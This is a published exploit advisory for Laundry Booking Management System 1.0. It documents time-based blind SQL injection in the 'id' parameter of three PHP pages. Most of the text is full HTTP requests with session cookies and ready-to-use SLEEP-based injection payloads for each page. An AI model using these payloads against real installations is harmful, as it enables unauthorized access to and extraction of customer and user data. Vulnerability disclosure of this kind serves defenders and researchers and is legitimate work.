| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 | # Exploit Title: Laundry Booking Management System 1.0 - 'Multiple' SQL Injection # Date: 2021-08-19 # Exploit Author: Azumah Foresight Xorlali # Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14400&title=Laundry+Booking+Management+System+in+PHP+with+Free+Source+Code # Version: Version 1.0 # Category: Web Application # Tested on: Kali Linux Description: Laundry Booking Management System 1.0 application is vulnerable to SQL injection via the "id" parameter, which was not properly checked on the [edit_user.php,edit_customer.php,edit_order.php] page. #Vulnerable Request when logged in as a user with Supervisor or Manager: POST /laundry_sourcecode/laundry_sourcecode/edit_user.php?id=7 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/laundry_sourcecode/laundry_sourcecode/edit_user.php?id=7 Content-Type: multipart/form-data; boundary=---------------------------851226474159708868105526498 Content-Length: 1408 Connection: close Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r Upgrade-Insecure-Requests: 1 --- Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=7' AND (SELECT 5999 FROM (SELECT(SLEEP(5)))BOpa) AND 'voSh'='voSh --- ----------------------------------------------------------------------------------------------------------------------- #Vulnerable Request when logged in as Admin: POST /laundry_sourcecode/laundry_sourcecode/edit_customer.php?id=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/laundry_sourcecode/laundry_sourcecode/edit_customer.php?id=1 Content-Type: multipart/form-data; boundary=---------------------------17781030011592905058578147050 Content-Length: 767 Connection: close Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r Upgrade-Insecure-Requests: 1 --- Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 6874 FROM (SELECT(SLEEP(5)))ZCjC) AND 'GIau'='GIau --- ----------------------------------------------------------------------------------------------------------------------- #Vulnerable Request when logged in a Admin: POST /laundry_sourcecode/laundry_sourcecode/edit_order.php?id=18 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/laundry_sourcecode/laundry_sourcecode/edit_order.php?id=18 Content-Type: multipart/form-data; boundary=---------------------------167059892515401580571429373524 Content-Length: 886 Connection: close Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r Upgrade-Insecure-Requests: 1 --- Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=18' AND (SELECT 8201 FROM (SELECT(SLEEP(5)))odDG) AND 'wCli'='wCli --- |